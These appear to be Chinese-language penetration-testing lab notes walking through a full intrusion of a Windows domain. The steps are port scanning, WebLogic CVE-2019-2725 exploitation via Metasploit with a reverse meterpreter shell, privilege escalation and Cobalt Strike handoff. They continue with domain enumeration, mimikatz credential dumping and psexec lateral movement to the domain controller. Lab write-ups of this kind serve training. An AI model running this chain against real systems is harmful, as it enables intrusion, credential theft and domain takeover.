001# 信息收集
nmap -sS -v 192.168.0.80 //端口探测
open :
80、135、139、445、1433、3389、7001、49152、49153、49154
445 -》smb ms17_010
139-》samba->爆破/未授权访问/远程命令执行
1433-》mssql-》爆破/注入/SA弱口令
7001-》weblogic-》反序列化漏洞
--------
002 ##发现
weblogicScan
python WeblogicScan.py 192.168.0.80 7001
-》SSRF CVE-2019-2725 CVE-2019-2729
-》 http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp
-》search-》post-》burpsuite-》operator
---------
msf-》search CVE-2019-2725->
set rhosts 192.168.0.80
set lhost 192.168.0.129
set target 1
run
->meterpreter>ipconfig
#提权
getuid
getsystem
## 内网渗透
CS->msf
CS:listener->beacon http->8888
msf:>background
use exp/win/local/payload_inject
set payload win/meterpreter/reverse_http
set DisablePayloadHandler true
set lport 8888
set session 2
run
----提权
host->执行->提权
# 信息收集
shell ipconfig /all
》10.0.0.1/24 192.168.0.0 域控ip:10.10.10.10
》delay.com
shell net user /domain
shell net group "domain admins" /domain # 查看域管理员用户
shell net group "domain contrallers" /domain #域控
shell net group "domain computers" /domain #查看狱中其他主机
shell ping PC$
shell ping DC$
shell arp -a
-》de1ay.com
-》DC.de1ay.com
portscan 10.0.0.0/24 1-1024,3389,5000-6000, arp,1024
-》445
psexec 横向移动
10.0.0.80
host-》执行-》Run mimikatz-》listener beacon SMB
10.0.0.10
host->jump->psexec64
username
password
domain
SMB
sessions
->success online!!
对其他机器横向
---